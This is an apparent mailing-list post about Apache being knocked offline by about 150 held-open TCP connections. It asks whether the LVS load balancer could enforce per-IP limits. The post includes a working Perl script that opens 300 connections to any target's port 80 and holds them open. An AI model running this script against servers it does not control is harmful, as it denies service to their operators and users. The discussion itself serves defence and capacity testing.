|
Hi,
To my surprise, opening 150 tcp connections to a default apache
installation is enough to effectively DoS it for a few minutes (until
connections time out). This could be circumvented by using
mod_throttle, mod_bwshare or mod_limitipconn but imho a much better
place to solve this is at the LVS loadbalancer. Which already does
source IP tracking for the "persistency" feature.
Did anyone implement such a feature? Considerations?
A sample script to test your webhosting provider:
#!/usr/bin/perl
my $target = shift or die "Usage: $0 <target>\n";
use IO::Socket::INET;
for my $t (0..300) {
print "Try $t... ";
$cons[$t] = IO::Socket::INET->new( PeerAddr => "$target:80", Proto
=> 'tcp', Blocking => 1 )
or die "Couldn't connect!";
print "connected!\n";
}
print "Enter to drop connections...\n";
<STDIN>;
Regards,
Willem
|
